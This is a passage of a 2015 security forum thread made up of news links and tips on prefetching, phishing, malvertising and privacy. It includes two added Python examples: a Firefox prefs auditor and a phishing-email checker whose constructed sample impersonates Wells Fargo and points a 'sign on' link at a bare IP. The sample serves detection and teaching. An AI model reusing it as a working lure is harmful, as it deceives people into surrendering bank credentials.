Firefox users exercise caution http://betanews.com/2015/08/15/firefox-stealthily-loads-webpages-when-you-hover-over-links-heres-how-to-stop-it/
Thanks for sharing that Essex. Applied. :)
-
Firefox users exercise caution http://betanews.com/2015/08/15/firefox-stealthily-loads-webpages-when-you-hover-over-links-heres-how-to-stop-it/
This pre-fetching has been going on for years (not just in firefox) in the days of mass dial-up users, disabled by me. It used to be more than just hovering over a link that was prefetched. If you visited a page, you didn't even have to hover over a link, links in that page could be pre-fetched right away.
Check for 'prefetch' without the quotes in about:config and you will see and prefetch settings (including the old settings) depending on what add-ons that you have there may well be prefetch settings for those.
I think that now we are in a mass broadband environment, you would think that pre-fetching would be dead and buried and not reinvigorated.
-
Firefox users that use their browser a la default are at risk when they use their browser to read webmail and on other occasions like here in this very thread: http://slashdot.org/story/15/08/14/2321202/how-to-quash-firefoxs-silent-requests
"This can be used to instantly identify a user using a site's private messaging feature, or identify users viewing a thread in a web forum."
Feature can be stopped in about:config: https://support.mozilla.org/en-US/kb/how-stop-firefox-making-automatic-connections#w_speculative-pre-connections
It is a sad thing that users should intervene more and more to protect the last tiny bit of digital privacy,
and most now are completely out on their own. So better have this at the back of your heads - on the Interwebs you are continuously being tracked and traced. Do not put out there anything you do not want to be completely "out in the open".
polonus
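The two posts above point at the about:config switches for prefetching and speculative pre-connections. The following is an added example (not code from the thread or from Mozilla) that audits a Firefox prefs.js or user.js offline: it parses the `user_pref(...)` lines, compares the four background-request preferences against the values that switch the behaviour off, and renders user.js lines for anything left at its default. The preference names are the ones visible in about:config at the time of these posts; the sample prefs file is constructed.

```python
"""Audit a Firefox prefs.js / user.js for prefetch and speculative-connection
settings. Added example; the sample prefs below are constructed."""
import re
from typing import Dict, List, Optional, Tuple, Union

PrefValue = Union[bool, int, str]

# Preferences that drive Firefox's automatic background requests, mapped to
# the value that turns each one off. Names as shown in about:config; confirm
# against your own Firefox version before relying on them.
PRIVATE_VALUES: Dict[str, PrefValue] = {
    "network.prefetch-next": False,                # <link rel="prefetch"> fetching
    "network.dns.disablePrefetch": True,           # DNS lookups for links on a page
    "network.http.speculative-parallel-limit": 0,  # TCP pre-connect on link hover
    "network.predictor.enabled": False,            # network predictor
}

# Matches both `user_pref("name", value);` (user.js/prefs.js) and `pref(...)`.
_PREF_RE = re.compile(r'^\s*(?:user_)?pref\("([^"]+)",\s*(.+?)\);\s*$')


def parse_value(raw: str) -> PrefValue:
    """Convert the literal on the right-hand side of a pref line."""
    raw = raw.strip()
    if raw == "true":
        return True
    if raw == "false":
        return False
    if re.fullmatch(r"-?\d+", raw):
        return int(raw)
    if len(raw) >= 2 and raw[0] == '"' and raw[-1] == '"':
        return raw[1:-1]
    raise ValueError(f"unrecognised pref value: {raw!r}")


def parse_prefs(text: str) -> Dict[str, PrefValue]:
    """Later lines win, which is how Firefox itself applies duplicate prefs."""
    prefs: Dict[str, PrefValue] = {}
    for line in text.splitlines():
        m = _PREF_RE.match(line)
        if m:
            prefs[m.group(1)] = parse_value(m.group(2))
    return prefs


def audit_prefetch(prefs: Dict[str, PrefValue]) -> List[Tuple[str, Optional[PrefValue], PrefValue]]:
    """Return (pref, found, wanted) for each pref not in its private state.
    A pref absent from the file is at its built-in default, which for all four
    is the 'on' state, so it is reported with found=None."""
    findings = []
    for name, wanted in PRIVATE_VALUES.items():
        have = prefs.get(name)
        if have != wanted:
            findings.append((name, have, wanted))
    return findings


def user_js_fix(findings) -> List[str]:
    """Render user.js lines that set every non-compliant pref to its private value."""
    lines = []
    for name, _found, wanted in findings:
        if isinstance(wanted, bool):        # check bool before int: bool is an int subclass
            literal = "true" if wanted else "false"
        elif isinstance(wanted, int):
            literal = str(wanted)
        else:
            literal = f'"{wanted}"'
        lines.append(f'user_pref("{name}", {literal});')
    return lines


# Constructed sample: prefetch-next already off, the rest still at defaults.
SAMPLE_PREFS = """\
// constructed prefs.js for this example
user_pref("browser.startup.homepage", "about:blank");
user_pref("network.prefetch-next", false);
user_pref("network.http.speculative-parallel-limit", 6);
user_pref("network.dns.disablePrefetch", false);
"""

if __name__ == "__main__":
    findings = audit_prefetch(parse_prefs(SAMPLE_PREFS))
    for name, have, wanted in findings:
        print(f"{name}: is {have!r}, want {wanted!r}")
    print("\n".join(user_js_fix(findings)))
```

Run it against a copy of your own profile's prefs.js to see what is still at its default; the rendered lines can be appended to user.js, and the checker run again on the combined file should report nothing.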
-
Firefox users that use their browser a la default are at risk when they use their browser to read webmail and on other occasions like here in this very thread: http://slashdot.org/story/15/08/14/2321202/how-to-quash-firefoxs-silent-requests
"This can be used to instantly identify a user using a site's private messaging feature, or identify users viewing a thread in a web forum."
Feature can be stopped in about:config: https://support.mozilla.org/en-US/kb/how-stop-firefox-making-automatic-connections#w_speculative-pre-connections
It is a sad thing that users should intervene more and more to protect the last tiny bit of digital privacy,
and most now are completely out on their own. So better have this at the back of your heads - on the Interwebs you are continuously being tracked and traced. Do not put out there anything you do not want to be completely "out in the open".
polonus
One should never "put something out there" that one doesn't expect every one to have access to.
It makes no difference if this information is published in a forum, a chat, private or otherwise, a blog or any other method of publishing.
It also doesn't matter what browser or other means you use to put out this information. If it's on the internet, consider it public.
You may attempt, through various means, to conceal the information but ultimately, you can not hide the information.
There is no privacy on the internet.
-
Hi bob3160,
The browser tweaking list gets longer and longer and all this has been decided for us by others, for the greater part well over our heads and also mostly, as they say, "for our own good", and we all agreed to all that by starting to use the technology. What has remained of that so-called "land of the free" we still used to know?
Damian
-
Hi bob3160,
The browser tweaking list gets longer and longer and all this has been decided for us by others, for the greater part well over our heads and also mostly, as they say, "for our own good", and we all agreed to all that by starting to use the technology. What has remained of that so-called "land of the free" we still used to know?
Damian
All the tweaking in the world still can't make you hide or become invisible.
It can only make finding you more difficult. :(
When you consider that AT&T (http://www.zdnet.com/article/att-phone-provider-tapped-networks-helped-nsa/) and other large companies whose services most people use
help the NSA spy on millions of Americans' calls and email. In the US it's the NSA, but all countries have the same types of agencies that do the same things to their citizens.
Hiding becomes totally impossible.
-
Hi bob3160,
So everyone everywhere should always remember what is shown as attached (happens) :o
polonus
-
from 2010 but interesting read https://securelist.com/blog/opinions/30611/on-the-way-to-better-testing/
-
A Week in Security (Aug 09 – Aug 15)
https://blog.malwarebytes.org/online-security/2015/08/a-week-in-security-aug-09-aug-15/?utm_source=Gplus&utm_medium=social
The Multi-language Tech Support Scam is Here
https://blog.malwarebytes.org/fraud-scam/2015/08/the-multi-language-tech-support-scam-is-here/?utm_source=Gplus&utm_medium=social
-
Expensive service blocked competitors to encash 80 dollars a day: https://www.fcc.gov/document/fcc-fines-smart-city-750k-blocking-wi-fi-0
polonus
-
MS Emergency patch released: http://blogs.technet.com/b/msrc/archive/2015/08/18/out-of-band-release-for-security-bulletin-ms15-093.aspx
pol
-
How to Protect Your School Computer
https://www.malwarebytes.org/articles/how-to-protect-your-school-computer/?utm_source=Gplus&utm_medium=social
“Crucial Reference” 419 Spam
https://blog.malwarebytes.org/fraud-scam/2015/08/crucial-reference-419-spam/
Wigo Means Bingo for Blackseo Agent
https://blog.sucuri.net/2015/08/wigo-means-bingo-for-blackseo-agent.html?utm_campaign=Wigo%20Means%20Bingo%20for%20Blackseo%20Agent%20Blogpost&utm_medium=social&utm_source=googleplus
My Website Was Blacklisted By Google and Distributing Email Spam
https://blog.sucuri.net/2015/04/my-website-was-blacklisted-by-google-and-distributing-email-spam.html?utm_campaign=My%20Website%20Was%20Blacklisted%20By%20Google%20and%20Distributing%20Email%20Spam%20Blogpost&utm_medium=social&utm_source=googleplus
-
Adware changes ABP settings, AdBlocker Plus exploit puts OSX users at risk: http://www.webroot.com/blog/2015/08/19/adblocker-plus-puts-osx-at-risk/
polonus
-
IE Under Attack! Microsoft Releases Emergency Out-of-Band Patch
http://www.tripwire.com/state-of-security/vulnerability-management/ie-under-attack-microsoft-releases-emergency-out-of-band-patch/
Time’s Up! – Ashley Madison Data Released
https://blog.malwarebytes.org/hacking-2/2015/08/for-sign-off-times-up-ashley-madison-data-released/
Scam Banking on Roller Coaster Disaster Seen in the Wild
https://blog.malwarebytes.org/fraud-scam/2015/08/scam-banking-on-roller-coaster-disaster-seen-in-the-wild/
-
Spotify wants to spy on you: http://libertyblitzkrieg.com/2015/08/20/youve-been-warned-spotify-wants-to-spy-on-you-in-every-way-imaginable/
polonus
-
Spotify wants to spy on you: http://libertyblitzkrieg.com/2015/08/20/youve-been-warned-spotify-wants-to-spy-on-you-in-every-way-imaginable/
polonus
It can't spy on you if you don't have it installed. :)
-
IE Under Attack! Microsoft Releases Emergency Out-of-Band Patch
http://www.tripwire.com/state-of-security/vulnerability-management/ie-under-attack-microsoft-releases-emergency-out-of-band-patch/
lol
If my memory serves me, it seems like IE has been under attack since forever.
-
Exploring a “Malwarebytes Anti-Malware for Windows 10” website…
https://blog.malwarebytes.org/online-security/2015/08/exploring-an-mbam-for-windows-10-website/
Round 2 – Impact Team vs. Ashley Madison
https://blog.malwarebytes.org/hacking-2/2015/08/round-2-impact-team-vs-ashley-madison/
Telstra Media’s Homepage Pushes Malvertising
https://blog.malwarebytes.org/news/2015/08/telstra-medias-homepage-pushes-malvertising/
Stranger Danger and the Sociable Child
https://blog.malwarebytes.org/online-security/2015/08/stranger-danger-and-the-sociable-child/
Malvertising Hits Online Dating Site PlentyOfFish
https://blog.malwarebytes.org/malvertising-2/2015/08/malvertising-hits-online-dating-site-plentyoffish/
@ schmidthouse +1 Edge will be next.
-
How the internet started .... Old news but some may be interested
ARPANET https://en.m.wikipedia.org/wiki/ARPANET
First country connected outside the US
www.paleofuture.gizmodo.com/the-secret-project-to-turn-the-internet-into-an-anti-so-1724555107
www.norsar.no/norsar/about-us/History/Internet/
-
Thousands of WP sites hacked spreading malware: http://research.zscaler.com/2015/08/neutrino-campaign-leveraging-wordpress.html
polonus
-
Ongoing security problem - public FTP servers: http://findex.cedsys.nl/research/mass-ftp-crawling/
link author: Sander Ferdinand
polonus
-
Torrent Trackers ban Windows 10 clients: https://torrentfreak.com/torrent-trackers-ban-windows-10-over-privacy-concerns-150822/
Why? Read: http://lifehacker.com/what-windows-10s-privacy-nightmare-settings-actually-1722267229
polonus
-
Torrent Trackers ban Windows 10 clients: https://torrentfreak.com/torrent-trackers-ban-windows-10-over-privacy-concerns-150822/
Why? Read: http://lifehacker.com/what-windows-10s-privacy-nightmare-settings-actually-1722267229
polonus
Sorry Damian but your Why isn't correct.
Torrents are afraid of the fact that some of their cracked software might be spotted.
-
A Week in Security (Aug 16 – Aug 22)
https://blog.malwarebytes.org/online-security/2015/08/a-week-in-security-aug-16-aug-22/
Phishing Tale: An Analysis of an Email Phishing Scam
https://blog.sucuri.net/2014/06/phishing-tale-an-analysis-of-an-email-phishing-scam.html?utm_campaign=Phishing%20Tale%3A%20An%20Analysis%20of%20an%20Email%20Phishing%20Scam%20Blogpost&utm_medium=social&utm_source=googleplus
Your Website Hacked but No Signs of Infection
https://blog.sucuri.net/2015/06/your-website-hacked-but-no-signs-of-infection.html?utm_campaign=Your%20Website%20Hacked%20but%20No%20Signs%20of%20Infection%20Blogpost&utm_medium=social&utm_source=googleplus
-
Thousands of sites with EV-SSL Certificates wrongly presented in Google Chrome:
see: http://news.netcraft.com/archives/2015/08/24/thousands-short-changed-by-ev-certificates-that-dont-display-correctly-in-chrome.html
polonus
-
Thousands of sites with EV-SSL Certificates wrongly presented in Google Chrome:
see: http://news.netcraft.com/archives/2015/08/24/thousands-short-changed-by-ev-certificates-that-dont-display-correctly-in-chrome.html
polonus
Interesting.
"Comodo is the CA most affected by the May 2015 policy update, with almost 6,000 EV certificates at risk if Google's new policy is applied from 1st Jan 2015.
Comodo has recently issued certificates with SCTs from too few independent logs: for example,
Comodo issued a certificate on 3rd August 2015 that is missing a non-Google SCT."
-
Instagram Follower Booster Leads to SMS Browser Extension PUP
https://blog.malwarebytes.org/online-security/2015/08/instagram-follower-booster-leads-to-sms-browser-extension-pup/
-
Privacy worse than in fictional "1984": http://www.theguardian.com/world/2015/aug/24/we-need-geneva-convention-for-the-internet-says-new-un-privacy-chief
It almost seems that smartphones were created with data and privacy breach in mind; in these respects the technology is a total fail:
http://www.upenn.edu/computing/security/checklists/Top10/Top_10_Tips_for_Smartphones.php
As ad-monitoring and launching came to ruin the last vestiges of privacy protection, the end-user is left in the cold with a take-it or leave-it situation. A great example was the banning of adblock apps by Google on their Android OS, a measure that also blocked the user from ways to protect against malvertising, and this could be seen as a compromise of user security. Here we see a monopolist versus end-user conflict, where the monopolist can no longer guarantee either "any" privacy or the end-user's security against malware. This is a sad situation.
polonus
-
AT&T hotspots inject adware into your Wifi traffic.
This borders on malvertising practices; a hotspot sprouting ads is highly controversial:
http://webpolicy.org/2015/08/25/att-hotspots-now-with-advertising-injection/
link article author = Jonathan Mayer
polonus
-
AT&T hotspots inject adware into your Wifi traffic.
This borders on malvertising practices; a hotspot sprouting ads is highly controversial:
http://webpolicy.org/2015/08/25/att-hotspots-now-with-advertising-injection/
link article author = Jonathan Mayer
polonus
Is the hotspot Free ??? Are there alternatives ???
-
If that is the way they want to enrich the user's experience, I would say no thank you.
With Open Wifi you'd get the normal ads, understandable, but not additional ones where you would not expect them to pop up,
and can you not reckon on Google to block injected ads?
Well they started to kill the noisy ones now from their browser.
Another topic.
Some intern you would not like to hire for sure:
http://money.cnn.com/2015/07/15/technology/hacker-fireeye-intern/
polonus
-
If that is the way they want to enrich the user's experience, I would say no thank you.
With Open Wifi you'd get the normal ads, understandable, but not additional ones where you would not expect them to pop up,
and can you not reckon on Google to block injected ads?
Well they started to kill the noisy ones now from their browser.
Another topic.
Some intern you would not like to hire for sure:
http://money.cnn.com/2015/07/15/technology/hacker-fireeye-intern/
polonus
FireEye did fire him. :)
-
If that is the way they want to enrich the user's experience, I would say no thank you.
With Open Wifi you'd get the normal ads, understandable, but not additional ones where you would not expect them to pop up,
and can you not reckon on Google to block injected ads?
Well they started to kill the noisy ones now from their browser.
Another topic.
Some intern you would not like to hire for sure:
http://money.cnn.com/2015/07/15/technology/hacker-fireeye-intern/
polonus
FireEye did fire him. :)
AND that exceptional talent/knowledge could have been put to honest use/ wrong choice. :-\
-
Hi schmidthouse,
Some choose the left-hand path nevertheless, and then some get found out. In the light of the above news- Tor no longer completely safe as criminal safehaven, illegal marketplace Agora decides to momentarily interrupt their present illegal operations because of a hidden-tor flaw: read:
http://pastebin.com/7AVDGVpV (posted by Agora moderation).
because of this tor-vulnerability: https://news.mit.edu/2015/tor-vulnerability-0729
So g33ks that choose for the dark side of the Interwebs also have their problems, not only we, the good upfront guys.
Nothing is what it seemed anymore - "Nacht und Nebel" -"The truth is out there somehow" ;)
polonus
-
(https://lh3.googleusercontent.com/proxy/ZeNZ6Abpf51HbciPSit0jfngFvHbJBeVb_9cJe_CVNdUZmXHTWTNeUyVDhLw8d5xTtQ5WeNKTEDszBkOqG-ryL08essCspLYUA1W=w506-h311)
Starting 9/1/2016 Google will block Flash Ads by default.
Flash will be out, HTML 5 will be taking its place.
https://plus.google.com/+GoogleAds/posts/2PmwKinJ7nj
-
Browsefox variant High Stairs
https://blog.malwarebytes.org/security-threat/2015/08/browsefox-variant-high-stairs/
“Rewards” Page Promises Discount for Your PUP Purchase
https://blog.malwarebytes.org/fraud-scam/2015/08/rewards-page-promises-discount-for-your-pup-purchase/
Angler Exploit Kit Strikes on MSN.com via Malvertising Campaign
https://blog.malwarebytes.org/malvertising-2/2015/08/angler-exploit-kit-strikes-on-msn-com-via-malvertising-campaign/
-
Just stumbled upon this via scanning for my "virus & worms" postings: -> https://forum.avast.com/index.php?topic=175770.0
Apart from some SEO experts, no one really seems to care for this kind of manipulation and abuse and even Google seems to turn a blind eye, although they must have been aware a lot of this is going on. If not negative SEO then certainly manipulation is going on: https://managewp.com/is-wordpress-seo-by-yoast-broken article author = Tom Ewer.
polonus
-
Login credentials for 225,000 Apple customers stolen, leaked online
http://www.news.com.au/technology/online/login-credentials-for-225000-apple-customers-stolen-leaked-online/story-fnjwnj25-1227508036288
-
Genieo installer tricks keychain
https://blog.malwarebytes.org/mac/2015/08/genieo-installer-tricks-keychain/?utm_source=Gplus&utm_medium=social
-
New Spear Phishing Campaign Pretends to be EFF
https://www.eff.org/deeplinks/2015/08/new-spear-phishing-campaign-pretends-be-eff
-
TLDs you'd better shun or block: https://www.bluecoat.com/company/press-releases/blue-coat-reveals-webs-shadiest-neighborhoods
polonus
-
Cybercrooks quickly bypass Adobe Flash Player's improved security protections
http://www.networkworld.com/article/2978860/microsoft-subnet/cybercrooks-quickly-bypass-adobe-flash-players-improved-security-protections.html
-
“Reply to Scammers”, they said. “It’ll be fun”, they said
https://blog.malwarebytes.org/online-security/2015/09/reply-to-scammers-they-said-itll-be-fun-they-said/?utm_source=Gplus&utm_medium=social
Shopperz alters dnsapi.dll
https://blog.malwarebytes.org/intelligence/2015/09/shopperz-alters-dnsapi-dll/?utm_source=Gplus&utm_medium=social
-
Study shows trackers making websites load dead-slow - you want to go back to a dial-up experience? : https://labsblog.f-secure.com/2015/09/01/trackers-are-out-of-control/
article author = Sean Sullivan.
pol
-
We don't need a rebirth of dial-up, I know how that connection feels and
I don't want it back of course :)
-
Start killing trackers then from the websites you visit.
Well you know the formula ;) block ads, scripts, trackers with the appropriate extensions/add-ons.
pol
-
I'm blocking trackers via the Avast AOS plugin, maybe I'll add more soon :)
-
New PCs with crapware (added trial software etc.), with an average of 20 additional programs, slow down your new computer big time.
(Spotify, dropbox etc.). Computers that are so-called signature PCs will start 104% faster. Read: http://www.microsoftstore.com/store/msusa/en_US/cat/categoryID.69916600
polonus
-
New PCs with crapware (added trial software etc.), with an average of 20 additional programs, slow down your new computer big time.
(Spotify, dropbox etc.). Computers that are so-called signature PCs will start 104% faster. Read: http://www.microsoftstore.com/store/msusa/en_US/cat/categoryID.69916600
polonus
Nice but at a price. If you're willing to spend the time and effort, order direct from the Manufacturer and insist on a "clean" computer.
It isn't easy but it can be done and the price will be cheaper. :) Or,
clean up the computer after you buy it before you start to add anything else.
Slim Computers (http://slimcomputer.com/) can help in the cleanup.
-
Thanks, bob3160, for that cleansing tip. I'm sure gonna do that on a Lenovo laptop now right after install.
As long as it isn't a permanent problem, it isn't that bad really.
Know some wrestle with slow computers and do not know how to speed them up a bit,
but that aside, I hope those that got a laptop as a present before going to school recently know what to do now,
well that is for the responsible lot among them, the others only will slow them up further. ;)
Damian
-
Another topic that's a part of my current presentation. :)
There's a lot more to the presentation than converting folks to Avast. :)
(http://www.screencast-o-matic.com/screenshots/u/Lh/1441375197930-97458.png)
https://docs.google.com/document/d/1kCzvKHaOiOgfAk1NuDnko-w0uqpgzj7Yx_LOIet23_Y/edit?usp=sharing
-
Thanks, bob3160, for that cleansing tip. I'm sure gonna do that on a Lenovo laptop now right after install.
As long as it isn't a permanent problem, it isn't that bad really.
<snip>
Well Lenovo are on their second strike with crapware that has a security implication.
They now have shot themselves in both feet and haven't got a leg to stand on.
I had been looking at a new laptop and Lenovo were generally good value for money, but just the first security nightmare was enough for me to rule out Lenovo in my plans. Trust is something that is hard to build up and so easy to lose.
-
I'm still happy with my Lenovo but I got rid of the crap before it ever got exposed to the net. :)
-
Steer Clear of this Skype Spam
https://blog.malwarebytes.org/fraud-scam/2015/09/steer-clear-of-this-skype-spam/?utm_source=Gplus&utm_medium=social (This is what happens when you use the most famous VoIP)
“Free Games” App Needs a Power Up
https://blog.malwarebytes.org/online-security/2015/09/free-games-app-needs-a-power-up/?utm_source=Gplus&utm_medium=social
-
Millions of WordPress websites vulnerable to hackers.
Heimdal warns: https://heimdalsecurity.com/blog/security-alert-ransomware-legitimate-websites-compromised-script-injection/
article author = Andra Zaharia.
pol
-
Norse Pirate Party starts new DNS-service: https://www.piratpartiet.no/2015/09/piratpartiet-setter-opp-apen-dns-server-ny-gratistjeneste-mot-nettsensur/ & https://www.piratpartiet.no/dns/
Re: http://toolbar.netcraft.com/site_report?url=http://185.56.187.149
Netcraft Risk Rating 5:10, facilitated via Zetta I.O., a big Norwegian cloud-data player.
http://toolbar.netcraft.com/site_report?url=http://149-187-56.185.c.no-osl1.zetta.io (:53)
polonus
-
Gozi Trojan financial web injection hacker pleads guilty
http://www.scmagazineuk.com/gozi-trojan-financial-web-injection-hacker-pleads-guilty/article/437201/
Avoid this BSoD Tech Support Scam
https://blog.malwarebytes.org/fraud-scam/2015/09/avoid-this-bsod-tech-support-scam/?utm_source=Gplus&utm_medium=social
Malicious Google Search Console Verifications
https://blog.sucuri.net/2015/09/malicious-google-search-console-verifications.html?utm_campaign=Malicious%20Google%20Search%20Console%20Verifications%20Blogpost&utm_medium=social&utm_source=googleplus
Com[dot]com Site Leads to Fake Daily Mail Article, Other Dodgy Sites
https://blog.malwarebytes.org/fraud-scam/2015/09/comdotcom-site-leads-to-fake-daily-mail-article-other-dodgy-sites/?utm_source=Gplus&utm_medium=social
Ashley Madison's Leaked Top 20 Passwords Are All Really, Really Stupid
(News alert: always use your brain when creating passwords.) (Check strength of passwords here https://howsecureismypassword.net/)
https://www.distractify.com/mykafox-everyone-out-of-the-monkey-house-1337355706.html
MGS V: The Phantom Game Downloader
https://blog.malwarebytes.org/online-security/2015/09/mgs-v-the-phantom-game-downloader/?utm_source=facebook&utm_medium=social
Thousands of Hacked Sites Lead to Offer of Famous Spy Software
https://blog.malwarebytes.org/online-security/2015/09/thousands-of-hacked-sites-lead-to-offer-of-famous-spy-software/?utm_source=Gplus&utm_medium=social
-
Google already had 300.000 complaints about Ad Injection, a growing problem;
read: http://research.google.com/pubs/pub43346.html
That is why polonus thinks a decent adblocker like uBlock or Adguard
or surfing via an adblocking Android browser app is a must
for every user that has online security at heart.
Ad Injection could of course also mean Malware Injection!
Google Safebrowsing is only a last line of defense here.
polonus
-
Anonymous browsing effort is not appreciated by DHS authorities to say the least:
https://www.propublica.org/article/library-support-anonymous-internet-browsing-effort-stops-after-dhs-email
Where people would strongly protest just a generation ago we now get general ignorance
and an empty gaze as reaction where privacy is concerned. :(
Re: https://www.reddit.com/r/TOR/comments/3kf0ss/first_library_to_support_anonymous_internet/
polonus
-
Mozilla postpones Firefox add-on signing enforcement
http://www.ghacks.net/2015/09/11/mozilla-postpones-firefox-add-on-signing-enforcement/
-
Mozilla postpones Firefox add-on signing enforcement
http://www.ghacks.net/2015/09/11/mozilla-postpones-firefox-add-on-signing-enforcement/
It probably cost them too many users....
-
Obfuscated URLs, where is that link taking you?
https://blog.malwarebytes.org/fraud-scam/2015/09/obfuscated-urls-where-is-that-link-taking-you/?utm_source=Gplus&utm_medium=social
-
Mozilla postpones Firefox add-on signing enforcement
http://www.ghacks.net/2015/09/11/mozilla-postpones-firefox-add-on-signing-enforcement/
It probably cost them too many users....
I honestly couldn't believe they could be that stupid surely their alpha and nightly users would have let them know this was a huge error.
Thankfully they have seen the error of their ways.
-
Hi DavidR,
Still hope Avast will sign AOS add-on (as they said they would with fx version 41) as signing software is always generally speaking a good practice. DrWeb's also signed their extension for that matter.
Damian
-
Too many things going wrong at FireEye's lately ::): http://www.theregister.co.uk/2015/09/08/fireeye_0day/
Re: https://www.insinuator.net/2015/09/sending-mixed-signals-what-can-happen-in-the-course-of-vulnerability-disclosure/
FireEye reacted that proprietary software secrets were revealed by these German info security researchers.
Question of money or a lack of knowledgeable expertise, e.g. surplus of generically educated IT staff,
but a lack of technical IT specialists, and that is obvious through recent major security incidents
(data breaches, compromittal, insecure practices, general incompetence)?
polonus
-
Big threat still: https://www.theprivacyblog.com/uncategorized/unauthorized-ssl-certificates-put-everyone-at-risk/
and read: http://arstechnica.com/security/2015/03/bogus-ssl-certificate-for-windows-live-could-allow-man-in-the-middle-hacks/
polonus
-
You certainly want a dating site to be encrypted, but often it is not: https://www.eff.org/deeplinks/2012/02/six-heartbreaking-truths-about-online-dating-privacy
polonus
-
“YellowSend, send your large files for free?”
https://blog.malwarebytes.org/security-threat/2015/09/yellowsend-send-your-large-files-for-free/?utm_source=Gplus&utm_medium=social
Beware of Sites Claiming to House “Gifts for My Subs”…
https://blog.malwarebytes.org/fraud-scam/2015/09/beware-of-sites-claiming-to-house-gifts-for-my-subs/?utm_source=Gplus&utm_medium=social
-
Mal-ad campaign goes on almost unnoticed for weeks and weeks with Angler exploit redirects, 139 million monthly British eBay visitors were at risk :o.
Read: https://blog.malwarebytes.org/malvertising-2/2015/09/large-malvertising-campaign-goes-almost-undetected/
So, my dear Avast friends, polonus will keep his adblocker with special subscription lists up and running.
polonus
-
Avoid This HMRC Tax Refund Phish
https://blog.malwarebytes.org/fraud-scam/2015/09/avoid-this-hmrc-tax-refund-phish/?utm_source=Gplus&utm_medium=social
-
Avoid This HMRC Tax Refund Phish
https://blog.malwarebytes.org/fraud-scam/2015/09/avoid-this-hmrc-tax-refund-phish/?utm_source=Gplus&utm_medium=social
This (and others) have been doing the rounds for some considerable time now.
-
Corrupted Firmware on hacked Cisco-Routers detected: https://www.fireeye.com/blog/threat-research/2015/09/synful_knock_-_acis.html
The routers were backdoored to be able to compromise several modules.
Link article authors: FireEye Threat Research's Bill Hau and Tony Lee.
polonus
-
Large Malvertising Campaign Goes (Almost) Undetected
https://blog.malwarebytes.org/malvertising-2/2015/09/large-malvertising-campaign-goes-almost-undetected/?utm_source=Gplus&utm_medium=social
Don’t Get Stuck on WhatsApp Stickers…
https://blog.malwarebytes.org/fraud-scam/2015/09/dont-get-stuck-on-whatsapp-stickers/?utm_source=Gplus&utm_medium=social
What's the difference between antivirus and anti-malware?
https://www.malwarebytes.org/articles/antivirus-vs-antimalware/?utm_source=Gplus&utm_medium=social
Fake Amazon UK Mail Asks You to Verify Your Account After “Breach”
https://blog.malwarebytes.org/fraud-scam/2015/09/fake-amazon-uk-mail-asks-you-to-verify-your-account-after-breach/?utm_source=Gplus&utm_medium=social
-
Phishing Attempt - Caution!
(http://www.screencast-o-matic.com/screenshots/u/Lh/1442519831732-80450.png)
If you look at the detailed senders address carefully, you should see this didn't really come from Wells Fargo.
(http://www.screencast-o-matic.com/screenshots/u/Lh/1442520055375-83247.png)
The spelling and grammar have gotten much better and more convincing.
However, if you hover your mouse over the included "signon" link you'll notice it doesn't go to Wells Fargo:
(http://www.screencast-o-matic.com/screenshots/u/Lh/1442520165797-29693.png)
This is a sure sign of a Phishing attempt. Don't be the fool that falls for it. Stay vigilant and be suspicious any time
you receive something like this from your bank or other type of financial institution.
Never click on the included link. If you aren't sure, take the initiative and contact your financial institution on your own.
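The two tells in the post above (a sender display name that claims the bank while the address domain says otherwise, and a "sign on" link whose target is not the bank's site) can be checked mechanically. This is an added example, not part of the forum post: it parses a constructed HTML email with the standard library, extracts every anchor's target and visible text, and reports any sender or link that does not resolve to the brand's registrable domain. The `.example` sender domain and the 198.51.100.23 address are documentation placeholders constructed for the sample.

```python
"""Flag phishing indicators in an email: mismatched sender domain and links
whose host is not the brand's own domain. Added example; sample is constructed."""
import email
import re
from email import policy
from email.utils import parseaddr
from html.parser import HTMLParser
from typing import List, Tuple
from urllib.parse import urlparse


class _LinkCollector(HTMLParser):
    """Collect (href, visible text) for every <a> in an HTML body."""

    def __init__(self) -> None:
        super().__init__()
        self.links: List[Tuple[str, str]] = []
        self._href = None
        self._text: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href", "") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def registrable(host: str) -> str:
    """Crude registrable domain: last two labels. Fine for .com brands,
    not for multi-part suffixes such as co.uk (use a public-suffix list there)."""
    parts = host.lower().rstrip(".").split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host.lower()


def check_message(raw: str, brand_domain: str) -> List[str]:
    """Return human-readable findings; an empty list means nothing suspicious."""
    msg = email.message_from_string(raw, policy=policy.default)
    findings: List[str] = []

    # 1. Sender: display name claims the brand but the address domain does not.
    display_name, addr = parseaddr(str(msg.get("From", "")))
    sender_domain = addr.rsplit("@", 1)[-1] if "@" in addr else ""
    brand_word = brand_domain.split(".")[0]
    if brand_word in display_name.lower().replace(" ", "") and registrable(sender_domain) != brand_domain:
        findings.append(f"From display name {display_name!r} but address domain is {sender_domain!r}")

    # 2. Links: every http(s) anchor must land on the brand's own domain.
    html_part = msg.get_body(preferencelist=("html",))
    if html_part is None:
        return findings
    collector = _LinkCollector()
    collector.feed(html_part.get_content())
    for href, text in collector.links:
        host = urlparse(href).hostname or ""
        if not host:
            continue
        if re.fullmatch(r"[\d.]+", host):
            findings.append(f"link {text!r} points at a bare IP address {host}")
        elif registrable(host) != brand_domain:
            findings.append(f"link {text!r} -> {href} (host {host} is not {brand_domain})")
    return findings


# Constructed sample, modelled on the post above; the sender domain and the
# link target are placeholders, not observed phishing infrastructure.
SAMPLE_MAIL = """\
From: "Wells Fargo Online" <alerts@wf-secure-notice.example>
To: customer@example.org
Subject: Action required: verify your account
Content-Type: text/html; charset="utf-8"

<html><body>
<p>Please <a href="http://198.51.100.23/wf/signon">sign on</a> to confirm your details.</p>
<p>Help: <a href="https://www.wellsfargo.com/help">https://www.wellsfargo.com/help</a></p>
</body></html>
"""

if __name__ == "__main__":
    for finding in check_message(SAMPLE_MAIL, "wellsfargo.com"):
        print(finding)
```

The hover check the post describes is exactly the href-versus-text comparison in the loop; the script just does it for every link at once, and treats a bare IP address as suspicious on its own since no bank sends customers to one.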
-
Thousands and thousands of hacked WordPress sites are spreading malware, read here: https://blog.sucuri.net/2015/09/wordpress-malware-active-visitortracker-campaign.html article author is Sucuri's Daniel Cid.
Attackers seem to use leaks in WP plug-ins. WP websites often haven't updated to the latest CMS software versions,
